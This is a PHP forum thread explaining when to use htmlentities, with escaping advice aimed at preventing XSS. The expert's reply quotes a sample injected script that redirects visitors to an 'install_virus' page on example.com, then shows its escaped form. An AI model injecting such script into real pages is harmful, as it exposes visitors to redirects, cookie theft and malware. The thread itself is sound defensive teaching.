practical example where to use htmlentities

Collapse
X
Collapse
 
  • Page of 1
  • Time
  • Show
Clear All
new posts
Previous template Next
  • pradeepjain
    Contributor
    • Jul 2007
    • 563
    #1

    practical example where to use htmlentities

    Hi i have read about htmlentities . i need to know when exactly should it be used,i.e some real world issues if its not used.
    Tags: None
    • Atli
      Recognized Expert Expert
      • Nov 2006
      • 5062
      #2
      Hey.

      The htmlentities function is used to make sure text can be safely printed into HTML. That is; it converts any character that might be read as part of the HTML markup, so that it will be displayed rather than parsed.

      For example, the < and > characters have specific meaning in HTML. They are used as start and end delimiters for HTML tags. - If you wanted to print them as a part of text (as the "less-than" and "greater-than" characters) rather than have them be parsed as a part of the HTML markup, you need to convert them into HTML entities.

      HTML entities are special character sequences that represent characters, so they can be printed into the HTML without messing it up. Like the < and > characters. Their HTML entities look like: "&lt;" and "&gt;".

      The htmlentities() function takes a normal string and converts any character like < and > into their respective HTML entity.
      [code=php]<?php
      // Say I wanted to print this into a navigation bar...
      $navText = "Home > Category > Product"

      // If I print that as it is, I risk messing up the HTML,
      // because > has special meaning in HTML markup.

      // However, if I do this:
      $navText = htmlentities($n avText);

      // $navText becomes:
      // - "Home &gt; Category &gt; Product"
      // Which your browser will ignore while parsing the
      // HTML, but will display as:
      // - "Home > Category > Product"
      ?>[/code]

      This is also a very important safety measure, to prevent XSS attacks. Websites that allow the public to add or edit text (like forums and comment sections) are a high-risk target for such attacks.

      Consider if I were to post this as a comment on your site:
      [code=javascript]<script>locatio n.href="http://example.com/install_virus.p hp";</script>[/code]
      If you printed that as-is into your page, everybody who visited it would be redirected to the URL, which could do anything from flood your visitors with ads, steal their cookies or even abuse browser vulnerabilities to install viruses.

      To protect your visitors from this, you can simply run the post through htmlentities before printing it, turning it into:
      [code=javascript]&lt;script&gt;l ocation.href=&q uot;http://example.com/install_virus.p hp&quot;;&lt;/script&gt;[/code]
      Which the browser will print as the original text, rather than execute it as a part of the client-side code.

        Comment

        • pradeepjain
          Contributor
          • Jul 2007
          • 563
          #3
          okie i got the concept well. i use a DB driven application . where exactly htmlentities should be used. while printing the data from DB on the screen rite. any other specific task where i need to use htmlentities to prevent XSS attacks

            Comment

            • Atli
              Recognized Expert Expert
              • Nov 2006
              • 5062
              #4
              It should only be used when printing data to a HTML page. It doesn't really matter where the data is coming from; if it is going to be printed into a HTML page, it should be run through this function (or something equivalent).

                Comment

                Previous template Next
                Working...